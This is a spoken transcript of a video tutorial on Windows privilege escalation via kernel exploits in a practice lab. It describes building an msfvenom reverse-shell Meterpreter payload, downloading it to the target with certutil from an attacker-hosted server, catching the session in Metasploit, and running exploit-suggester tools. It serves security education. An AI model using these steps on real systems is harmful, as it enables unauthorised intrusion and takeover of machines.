Hello everyone, this is Satvik and welcome to the second episode in Windows Privilege Escalation series. And in this video, I'm going to show you how you can exploit or how you can get the privileges through the help of kernel exploits. So without getting any delay, let's dive into the video. Guys, first of all, really thank you for all your support. If you want to connect to me personally, you can check out my Twitter. And if you want to be part of my community, you can check out my Discord server where you can ask your doubts and you can also get updates regarding the content that I'm going to upload. So, both the links are going to be in the description below. You can go and check that out. And coming to the video, so previously we discussed about introduction part, so where we covered like how you can deploy them and how you can get an RTP session, and also how you can get some kind of like we got an RTP session by default, like how you can get a command line session. Okay, so without help of like with the help of what you call netcat and the MSF venom. And also we discussed a small kind of information of enumeration through the help of WinPeace. So that's the part, and this video will be discussing about kernel exploits. So kernel, we all know, so it's a kind of the operating system is above kernel. So whatever the hardware and whatever everything it is, so kernel is going to manage the stuff. So that's regarding basic part about the kernel. So kernel exploits will work sometimes, but sometimes it might lead to crash your system. Okay, so crashing in the system, like let us assume that you got a kernel exploit, and if you try to exploit that, if it works, you will be getting a root privileges or admin privileges here, sorry. And if it doesn't work, what possibly can happen is like the whole system might crash. So what you need to do is like you need to reset that particular machine, the target machine in the case. So keep that in mind, and we'll be covering some two techniques. So the first one is through the help of a tool called as Windows Exploit Suggestion. So this tool works absolutely fine. This is kind of pretty old tool, but this works absolutely fine. Okay, and also guys, there is no particular task here in this room to perform this stuff. This is just going to be kind of showing of how this works, etc., like that. Okay, so if you can see here, so I got a command line session here. So let me open a new tab. Okay, so let me remove this file first of all. So now we can see there is nothing here except this shell file which I used to get, which I use it to get the shell session. So let me copy this URL, and also guys, all the resources and stuff, and also my notes, everything is going to be in the description below, so you can do check them out from there. Okay, so let me come back to my machine. So like you need to clone that particular repository into your target, into your attacker machine. Okay, so you shouldn't clone that into your attacker machine. Okay, oh sorry, target machine. It's kind of confusing to spell, so try to install it on your Kali machine. And now let's navigate to there. And also guys, this particular file, it is a Python file and it is based on Python 2. And if you don't have Python 2, so you need to install that. So apt install Python 2, and it is going to work fine. Okay, since I already have that, I'm not going to waste any time. And also guys, there are some dependencies here. So let me come back to this here, and you can see there are some dependencies like Python XLRD. So XLRD is a kind of module, so which is used to work with the Excel files and stuff. Okay, so make sure you have everything. And also guys, you'll be definitely facing some issues. Okay, so I'd be highly recommending you to go to this issues section within this particular repository, and you'll find your solutions. Trust me, it will definitely work. Okay, so now let's don't waste our time and let's run this thing. So Python 2, and also guys, you can see if I do an ls hyphen la, you can see I'm also having an executable, right? So I'm not giving any chmod plus x and stuff like that. So let's do a Python 2 and Windows exploit suggestion and hyphen help. Okay, so if you are not getting any kind of options like this, then it means that your tool or the dependencies are not properly installed. So make sure to install them so that you can work fine. So for the first time, what you need to do is like you need to update. So update in the sense like it is going to find out some vulnerable versions and stuff, and it is going to write down into some kind of Excel file. Okay, so that's the first step you need to do. Okay, so it's kind of simple. So just run an option hyphen update. Okay, so it is going to update and write it into some kind of Excel file. So if you're interested, you can just copy into your machine where you have an Excel related application installed, and you can just see it. So it is going to have some kind of information which this tool is going to use. Okay, so and the next part which this tool is going to require is the system info. So now you need to go back to your target machine. So this is the Windows machine here. So I'm going to simply run a command system info. So this tool is like pretty old, guys, and it is also one of the best tool that I can recommend to anyone. Okay, so this works absolutely fine, absolutely fine. Okay, so just copy all this stuff. Okay, and there is some kind of issue here. I'll be letting you know what that issue is in the coming part. So I'll be creating a file called as sys.txt, and I'm going to paste everything here, and I'm going to save this thing. So now we have everything. If I do an ls once again, you can see I have a database file, I have a system info file and everything like that. So let's run it. So Python 2 Windows exploit suggester, and you need to provide the database. So option is hyphen database. Okay, so it is going to be a same word only. Okay, so since I enlarged it, so it kind of messed up. So database, and you need to provide the Excel file. You can simply hit 2 or anything like that and hit tab. Okay, so it is going to show here, and you need to provide a system info file as well. System. You can check them all. So let me hit enter here. So there is going to be some kind of issue, guys. So you can see that this particular tool is only for only like this is unable to work with this thing. So like they have, so for this tool they have some predefined kind of operating system. So you can see that this particular operating system which we attacked is Windows Server 29, so it is not working. So in this case, okay, you need to modify some stuff, etc., like that. But like what you need to do is like you need to simply run this thing. Okay, and you'll be getting some options. Okay, so like even though you try this os text etc., like that, it will be not working because it's kind of new. So Windows Server 2019 is new, but if you take some rooms, capture the flag rooms or anything like that, so there might be using some kind of old version. Like we can't say whether it is vulnerable or not, but if you go back to this repository, you can see you'll be getting some information like this. Okay, so let me enlarge this a little bit. So you can see you'll be getting an information like this. So what you need to find out is like, so you'll be finding something like a vulnerabilities which is related to the kernel mode. Okay, so kernel, if there is something written as kernel etc., like that, so you need to definitely check that out because those are related to the kernel exploit. So what you need to do is like you need to simply, let us assume that there is something like this. So I cannot exploit this, but let me show you how you can do that. So copy this ms version and just paste it here, and you can see you can go to some website like this, like exploit db or whatever it is. So you can see there is I found something like this, and you can see like there is some kind of reports and stuff. So there will be some guides as well, guys, so you can do check them out from there. Okay, so like this you can go and simply try to exploit them. Okay, you don't need to learn everything it's going happen like that. So sometimes you might be finding some kind of something like you can simply type exploit like this or whatever it is, so you can simply search for them. So there is something like secwiki. So you can, what you need to do is like you need to simply copy this thing. Okay, so ms113010. Okay, and simply search here. So let me control F and control V. Okay, so sometimes you might find it. If it's not available, it's okay, you can do check them out in some exploit db or anywhere like that, and you'll be finding a good guide. So follow them and try to exploit, and you'll be getting an admin privileges. Okay, so that is how that's the technique of how you can use this Windows exploit suggester in order to get some kind like that. Okay, so now we'll be going to the next technique, which is going to be Metasploit through the help of a Meterpreter. So I already mentioned that in my notes. So you can see there is something like a privilege escalation through Metasploit. So this is a section, so it is kind of simple. So there is a module called as local suggester. So let me copy this, and if possible I'll try to show you this thing. So there is this module. So what you need to do is like you need to once you get a session in your MSF console, just background the session. So most probably try to get a Meterpreter session. So let's try to do that. Okay, so MSF venom -p Windows slash Meterpreter slash reverse TCP. Okay, so and also provide the L host and the L port. So let me get some kind of like this. So ip-a. So this is the IP address which is my IP address, and let's be the L port be port 555 because I'm already using port 444. Okay, so hyphen platform, I'll be using it for Windows. So let me close this thing. uh, Platform for the Windows. Okay, and hyphen format is going to be exe, and I'll be storing it like a Meterpreter. So met and 555.exe. So now it is going to generate a Meterpreter payload for me, so which we'll be using. So like you might not be using, you cannot use the functionality of this thing like with the help of this normal session. You need to have something like Meterpreter session. So Meterpreter session is kind of advanced. So if you are familiar with this Metasploit, you will be knowing about that. So let's wait till till it completes. Okay, so we got the file here, Meterpreter. So let's create a Python 2 server, a port 80. Okay, so I already downloaded that. So what we'll try to do is, so let's modify the previous command. So which is certutil command only. I already mentioned them in the introduction video, so you can check them out from there. So if you want to, but this is how certutil -url cache -f, and you need to provide the IP address of your machine from which you hosted your server, and the file name, and in which the file name you want to store. So let me hit enter. You can see it is downloaded and it's fine. So now let's open this MSF console, and I don't want to see any kind of stuff like that, so I'll be hitting -q. So it is just showing, it will not show all those ASCII art and stuff, so that's the reason. Let's wait for some time. And I would mostly prefer this particular Windows exploit suggestion, guys, because like this thing is kind of lagging kind of thing, so keep that in mind. Okay, so first of all, use exploits. We need to use a module called as thing multi/handler. Okay, so if I do show options, you can see few options here. We need to set the payload first of all. So set payload, so Windows /Meterpreter /reverse TCP. Okay, and set the L host to 10 thing. So set the L port to 555 4 5s, and let's run this. Let's wait and also run this thing. Now we can see we got a stage from a different machine. So this is the IP address of that Windows machine, and we got a Meterpreter session here. If I do a who am I think it doesn't work. ID, if I type ID, UID or system info, so whatever it is, so we just try to find out. Okay, I think the who am I might not work, so I need to go to shell and I need to get them, so that's fine. So sysinfo will work fine. You can see it is server 2016 architecture and stuff. So let's background this session. So how you can do that is bg. So if you type sessions, you can see there is a session here which is active. So what we'll be using is we'll be using something like this thing. So local exploit suggestion module. Okay, so this is the thing that we are going to use. Okay, so this is a kind of okay, so let's use this thing. So this is like a post module. Okay, so if I do show options, so you can see it requires only the session, and if you type sessions, you can see there is an ID for our session which is 1. So you need to set the session which is going to be 1, and let's run this thing. Sorry for my typo. So you can see it is going to take some time, guys, compared to that of Windows exploit suggestion. So I find like this is taking some more little bit of time, but almost both the tools will provide the same output. Okay, but here the case is like we are having Windows Server 2019, and I can't say whether this particular kernel exploits work or not, but if you want to work on, so try to go to some other rooms like Blue or some other Windows rooms which are available on TryHackMe or Hack the Box, and try to run these tools. Okay, so that is going to be kind of small exercise. Okay, so there might be some rooms which only works on this kernel exploit, so it's your chance. You can see it is collecting exploits like for 2227. Okay, so like it is going to take some time, so for that I'll just pause my video. Guys, it took some time here, and you can see it checked for like level 41 modules, I think. So you have some few exploits here, so you can use these exploits. Okay, some of them will be some of them are related to what you call this kernel exploit, so you can go and check them out. Okay, so and also it also checked for what it is vulnerable. Okay, so what is potentially vulnerable and what are not vulnerable as well. So this is how you can make use of this Windows exploit suggestion as well as this particular post module within within MSF console in order to get to exploit this kernel exploit. So that is everything, guys, for this video. So there might be some other tools as well, but these are the tools that I use mostly, and this Windows exploit suggestion will work absolutely fine, guys, in almost all the cases. But here the machine is not configured for that, so that's the case. But if you are having some vulnerable machine which you are trying out on TryHackMe or Hack the Box, you can just run this tool. It will absolutely work fine, because no one is going to use like Windows Server 2019 or 2022. So this is just for this room. So that is it. And if you really like this video, make sure you like it and do share with your friends who are really interested in this stuff. This is Satvik signing off, and I'll meet you in the next video. Thank you.